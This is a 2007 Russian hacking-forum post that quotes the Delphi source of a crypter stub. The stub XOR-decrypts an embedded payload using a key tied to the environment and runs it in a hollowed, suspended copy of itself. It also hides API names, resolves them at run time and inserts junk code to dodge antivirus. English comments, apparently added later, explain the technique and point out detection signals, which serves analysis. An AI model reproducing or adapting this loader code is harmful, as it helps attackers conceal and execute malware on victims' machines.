
  #64  
Старый 13.08.2007, 07:12
zl0y

Цитата:
Сообщение от Mescalin  
Вот это чудо я нашел в паблике



качать тут

Pass antichat

ЗЫ: сами понимаете, что нашел я его в паблике, так что качаете на свой страх и риск!!!
Во-первых, не качается, во-вторых, я уже его и сам нашел.
Исходнички говно-стаба:
Цитата:
// Loader ("stub") template of a crypter. _FILE_ below and _XORKEYVAR_ in
// nud_loader are placeholders that a builder is expected to substitute before
// compilation, so the listing as posted is not a complete program.
program Stub;

// Non-default image base for the stub's own executable.
// NOTE(review): presumably chosen so the stub's image does not occupy the
// payload's preferred base inside the child process - confirm. An unusual
// ImageBase value in the PE optional header is a cheap static triage signal.
{$IMAGEBASE $44440000}

uses
Windows;

var
// Only referenced as "+ z - z" in nud_loader, i.e. it never changes a value.
z: integer;
// Builder placeholder. NOTE(review): presumably expands to the declaration of
// the encrypted payload array `ff` that nud_loader decrypts - confirm.
_FILE_

var
// nud_loader computes xorkey := xorkeyconst xor xorkeyvar; nud_decrypt uses
// xorkey as the starting value of its rolling XOR key.
xorkey, xorkeyconst, xorkeyvar: byte;

type
// Overlay type used by StartMemory to index the PE section table.
TSections = array [0..0] of TImageSectionHeader;

// Returns a 32-bit additive checksum over DWORDs read from the second half of
// the file FileName. Not called anywhere in the visible listing.
// NOTE(review): the name suggests an anti-emulation check whose result is
// compared elsewhere - nothing on this page confirms that.
function nud_emulator(FileName: string): DWORD;
var
F: file of DWORD;
P: Pointer;
Fsize: DWORD;
Buffer: array [0..500] of DWORD;
begin
// FileMode 0 = open read-only.
FileMode := 0;
AssignFile(F, FileName);
Reset(F);
// Positions are counted in DWORD records, not bytes (F is a "file of DWORD").
Seek(F, FileSize(F) div 2);
Fsize := FileSize(F) - 1 - FilePos(F);
// Cap the read at 500 records; Buffer holds 501.
if Fsize > 500 then Fsize := 500;
BlockRead(F, Buffer, Fsize);
Close(F);
P := @Buffer;
// eax accumulates the sum of Buffer[0 .. Fsize-1]; ecx is the index.
// The loop body runs before the bound is tested.
asm
xor eax, eax
xor ecx, ecx
mov edi , p
@again:
add eax, [edi + 4*ecx]
inc ecx
cmp ecx, fsize
jl @again
mov @result, eax
end;
end;

// Rolling-XOR string transform: character i is XORed with a key that starts at
// 137 and increases by one per character, wrapping from 255 to 1 (never 0).
// XOR is its own inverse, so the same routine both encodes and decodes.
// Defender note: the start value is a constant, so every string hidden with
// this routine has one fixed encoded byte sequence that can be matched statically.
function encodestr(instr: string): string;
var
i, j: integer;
begin
result := '';
j := 137;
for i := 1 to length(instr) do
begin
result := result + chr(ord(instr[i]) xor j);
if j = 255 then j := 1 else inc(j);
end;
end;

// In-place decryption of arr with a rolling XOR key seeded from the global
// xorkey (set in nud_loader). The key increments per byte and wraps 255 -> 1.
procedure nud_decrypt(var arr: array of byte);
var
i, j: integer;
begin
j := xorkey;
for i := 0 to length(arr) - 1 do
begin
// "*" binds tighter than "xor" in Pascal, so this is arr[i] xor j xor $64.
arr[i] := arr[i] xor j xor $32*2;
if j = 255 then j := 1 else inc(j);
end;
end;


// Rounds sz up to the next multiple of al; a value that is already a multiple
// of al is returned unchanged.
function NDSize(sz: dword; al: dword): dword;
var
remainder: dword;
begin
remainder := sz mod al;
if remainder <> 0 then
Result := ((sz div al) + 1) * al
else
Result := sz;
end;


// winapi
// Local re-declarations of a few Windows API types and constants. The program
// also lists Windows in its uses clause, so these shadow the unit's own names.

type
DWORD = LongWord;
BOOL = LongBool;
LPCSTR = PAnsiChar;
UINT = LongWord;
FARPROC = Pointer;

PSecurityAttributes = ^TSecurityAttributes;
_SECURITY_ATTRIBUTES = record
nLength: DWORD;
lpSecurityDescriptor: Pointer;
bInheritHandle: BOOL;
end;
TSecurityAttributes = _SECURITY_ATTRIBUTES;
SECURITY_ATTRIBUTES = _SECURITY_ATTRIBUTES;

// Not referenced by any routine in the visible listing.
POverlapped = ^TOverlapped;
_OVERLAPPED = record
Internal: DWORD;
InternalHigh: DWORD;
Offset: DWORD;
OffsetHigh: DWORD;
hEvent: THandle;
end;
{$EXTERNALSYM _OVERLAPPED}
TOverlapped = _OVERLAPPED;
OVERLAPPED = _OVERLAPPED;
{$EXTERNALSYM OVERLAPPED}

const
MAX_PATH = 260;
GENERIC_WRITE = $40000000;
FILE_SHARE_WRITE = $00000002;
CREATE_NEW = 1;
INVALID_HANDLE_VALUE = DWORD(-1);
// Module name used by the three "external" declarations that follow this section.
kernel32 = 'kernel32.dll';


// Function pointers filled in at run time by the procedure stealth, so the
// corresponding APIs do not appear in the executable's import table.
// The parameter lists match these kernel32 prototypes:
//   nud_mem    - WriteProcessMemory
//   nud_create - CreateProcessA
//   nud_read   - ReadProcessMemory
//   nud_alloc  - VirtualAllocEx
var
nud_mem: function (hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
nSize: DWORD; var lpNumberOfBytesWritten: DWORD): BOOL; stdcall;
nud_create: function (lpApplicationName: PChar; lpCommandLine: PChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
nud_read: function (hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
nSize: DWORD; var lpNumberOfBytesRead: DWORD): BOOL; stdcall;
nud_alloc: function (hProcess: THandle; lpAddress: Pointer;
dwSize, flAllocationType: DWORD; flProtect: DWORD): Pointer; stdcall;


// Statically imported resolver functions, declared directly against kernel32.
// Defender note: an import table dominated by LoadLibraryA/GetProcAddress,
// with no process or memory APIs, is a common sign of run-time API resolution.
function LoadLibrary(lpLibFileName: PChar): HMODULE; stdcall; external kernel32 name 'LoadLibraryA';
function GetProcAddress(hModule: HMODULE; lpProcName: LPCSTR): FARPROC; stdcall; external kernel32 name 'GetProcAddress';
function GetTempPath(nBufferLength: DWORD; lpBuffer: PChar): DWORD; stdcall; external kernel32 name 'GetTempPathA';


// Resolves the four process/memory APIs by name at run time and stores them in
// nud_mem, nud_create, nud_read and nud_alloc.
// The string literals are the encodestr (rolling XOR, start key 137) form of
// the names, shown here as Windows-1251 text; decoded they read kernel32.dll,
// WriteProcessMemory, CreateProcessA, ReadProcessMemory and VirtualAllocEx.
// Some bytes of the literals appear to have been altered by the forum software.
// Defender note: because the XOR key schedule is fixed, these encoded byte
// sequences are constant across builds of this stub and usable as static
// signatures. None of the returned pointers is checked for nil.
procedure stealth;
var
hkernel: thandle;
begin
hkernel := LoadLibrary(pansichar(encodestr('впщвивјў цяш')));
@nud_mem := getprocaddress(hkernel, pansichar(encodestr('ЮшвшиЮэятчазШу члг')));
@nud_create := getprocaddress(hkernel, pansichar(encodestr('КшонщлЯвюсцзжЧ' )));
@nud_read := getprocaddress(hkernel, pansichar(encodestr('ЫпкиЭьауфбаЩры ка')));
@nud_alloc := getprocaddress(hkernel, pansichar(encodestr('ЯгщшшпгСэюьчРо' )));
end;

// Copies Length bytes from Source to Destination; functionally a plain Move.
// The arithmetic on the uninitialised local i and the always-true test
// "i = i" do not influence the copy.
// NOTE(review): looks like junk code added to change the compiled byte
// pattern - confirm.
procedure nud_copy(Destination: Pointer; Source: Pointer; Length: DWORD);
var
i :integer;
begin
i := i + $23 xor 178;
if i = i then
Move(Source^, Destination^, Length);
end;

// Runs the PE image at nf inside a newly created, suspended copy of the stub's
// own executable instead of writing it to disk - the technique catalogued as
// process hollowing (MITRE ATT&CK T1055.012).
//
// Visible steps:
//   1. Lay the file out in a local buffer the way a loader would map it:
//      headers first, then each section at section-alignment granularity.
//   2. Resolve the process/memory APIs (stealth) and start ParamStr(0)
//      with CREATE_SUSPENDED.
//   3. Allocate RWX memory in the child at the payload's preferred ImageBase
//      and write the laid-out image there.
//   4. Overwrite the 4 bytes at Context.Ebx + 8 with the new image base and
//      set Context.Eax to the payload entry point, then resume the thread.
//      (For a 32-bit process created suspended, EBX conventionally holds the
//      PEB address - PEB+8 being ImageBaseAddress - and EAX the start address.)
//
// No API return value is checked.
//
// Defender notes: the observable sequence is suspended child of the same image
// -> cross-process PAGE_EXECUTE_READWRITE allocation -> cross-process writes,
// including one into the child's PEB -> SetThreadContext -> ResumeThread.
// Afterwards the child's in-memory image no longer matches its file on disk,
// which memory-vs-disk comparison can detect.
procedure StartMemory(nf: pointer);
var
BaseAddress, Bytes, HeaderSize, InjectSize, SectionLoop, SectionSize: dword;
Context: TContext;
FileData: pointer;
ImageNtHeaders: PImageNtHeaders;
InjectMemory: pointer;
ProcInfo: TProcessInformation;
PSections: ^TSections;
StartInfo: TStartupInfo;
begin
// NT headers are located through the DOS header's _lfanew offset.
ImageNtHeaders := pointer(dword(dword(nf)) + dword(PImageDosHeader(nf)._lfanew));
GetMem(InjectMemory, InjectSize);
try
FileData := InjectMemory;
HeaderSize := ImageNtHeaders.OptionalHeader.SizeOfHeaders;
// The section table starts right after the optional header.
PSections := pointer(pchar(@(ImageNtHeaders.OptionalHeader)) + ImageNtHeaders.FileHeader.SizeOfOptionalHeader);
// Clamp the header copy so it ends before the earliest section's raw data.
for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
begin
if PSections[SectionLoop].PointerToRawData < HeaderSize then HeaderSize := PSections[SectionLoop].PointerToRawData;
end;
nud_copy(FileData, nf, HeaderSize);
FileData := pointer(dword(FileData) + NDSize(ImageNtHeaders.OptionalHeader.SizeOfHeaders , ImageNtHeaders.OptionalHeader.SectionAlignment));
// Sections are placed one after another in table order; each advances the
// write cursor by its VirtualSize rounded up to SectionAlignment.
for SectionLoop := 0 to ImageNtHeaders.FileHeader.NumberOfSections - 1 do
begin
if PSections[SectionLoop].SizeOfRawData > 0 then
begin
// Copy min(SizeOfRawData, VirtualSize) bytes of file data.
SectionSize := PSections[SectionLoop].SizeOfRawData;
if SectionSize > PSections[SectionLoop].Misc.VirtualSize then SectionSize := PSections[SectionLoop].Misc.VirtualSize;
nud_copy(FileData, pointer(dword(nf) + PSections[SectionLoop].PointerToRawData), SectionSize);
FileData := pointer(dword(FileData) + NDSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
end
else
begin
// Section without raw data: only reserve its space.
if PSections[SectionLoop].Misc.VirtualSize <> 0 then FileData := pointer(dword(FileData) + NDSize(PSections[SectionLoop].Misc.VirtualSize, ImageNtHeaders.OptionalHeader.SectionAlignment));
end;
end;
// Fill nud_create / nud_read / nud_alloc / nud_mem.
stealth;
ZeroMemory(@StartInfo, SizeOf(StartupInfo));
ZeroMemory(@Context, SizeOf(TContext));
// The host process is a second, suspended instance of this same executable.
nud_create(nil, pchar(ParamStr(0)), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
Context.ContextFlags := CONTEXT_FULL;
GetThreadContext(ProcInfo.hThread, Context);
// Reads the child's current image base; BaseAddress is not used afterwards.
nud_read(ProcInfo.hProcess, pointer(Context.Ebx + 8), @BaseAddress, 4, Bytes);
nud_alloc(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectSize, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE);
nud_mem(ProcInfo.hProcess, pointer(ImageNtHeaders.OptionalHeader.ImageBase), InjectMemory, InjectSize, Bytes);
nud_mem(ProcInfo.hProcess, pointer(Context.Ebx + 8), @ImageNtHeaders.OptionalHeader.ImageBase, 4, Bytes);
Context.Eax := ImageNtHeaders.OptionalHeader.ImageBase + ImageNtHeaders.OptionalHeader.AddressOfEntryPoint;
SetThreadContext(ProcInfo.hThread, Context);
ResumeThread(ProcInfo.hThread);
finally
FreeMemory(InjectMemory);
end;
end;
// Derives the XOR key, decrypts the embedded payload array ff in place and
// hands it to StartMemory.
// ff is not declared in the visible listing. NOTE(review): presumably
// supplied by the _FILE_ placeholder - confirm.
// The key has two parts: xorkeyconst, the sum of the characters at indices 2
// and 3 of the temp path returned by GetTempPath, and xorkeyvar, a per-build
// value substituted for _XORKEYVAR_.
// NOTE(review): tying the key to the temp path looks like environment keying,
// so the payload only decrypts correctly where those two characters match the
// build machine's - confirm. For analysis this means the plaintext payload
// cannot be recovered from the file alone without knowing or guessing them.
procedure nud_loader;
var
tmb: array [0..MAX_PATH] of char;
begin
gettemppath(MAX_PATH, tmb);
xorkeyconst := ord(tmb[2]) + ord(tmb[3]);
// "+ z - z" leaves the value unchanged.
xorkeyvar := _XORKEYVAR_ + z - z; //Decrypting Key
xorkey := xorkeyconst xor xorkeyvar;
nud_decrypt(ff);
// Tests the address of the first element, not the decrypted content.
if @ff[0] <> nil then
StartMemory(@ff[0]);
end;


// Stores the Windows directory path in S.
// Returns True when the second GetWindowsDirectory call reports a non-zero
// length, False otherwise; S is left untouched if the size query fails.
function GetWnd(var S: String): Boolean;
var
Needed, Written: Integer;
begin
Result := False;
// First call only asks for the required buffer size.
Needed := Windows.GetWindowsDirectory(nil, 0);
if Needed <= 0 then
Exit;
SetLength(S, Needed);
Written := Windows.GetWindowsDirectory(PChar(S), Needed);
// Trim to the number of characters actually written.
SetLength(S, Written);
Result := Written > 0;
end;

// Program entry point.
// DestFile is the encodestr output for the literal path, so CreateFile receives
// the XOR-transformed bytes as a file name. The handle is never closed, and
// FSize and st are not used afterwards.
// NOTE(review): these three statements look like filler that precedes the real
// work in nud_loader - confirm.
// The space inside "FILE_SHAR E_READ" appears to be a forum line-wrap artefact
// in the identifier FILE_SHARE_READ.
var
FSize: DWORD;
DestHFile: THandle;
DestFile : string;
st: string;
begin
DestFile := encodestr('c:\0000001.dat');
DestHFile := CreateFile(pchar(DestFile),GENERIC_WRITE,FILE_SHAR E_READ,nil,CREATE_ALWAYS,0,0);
FSize:=GetFileSize(DestHFile,nil);
// Decrypts the embedded payload and runs it in a hollowed child process.
nud_loader;
end.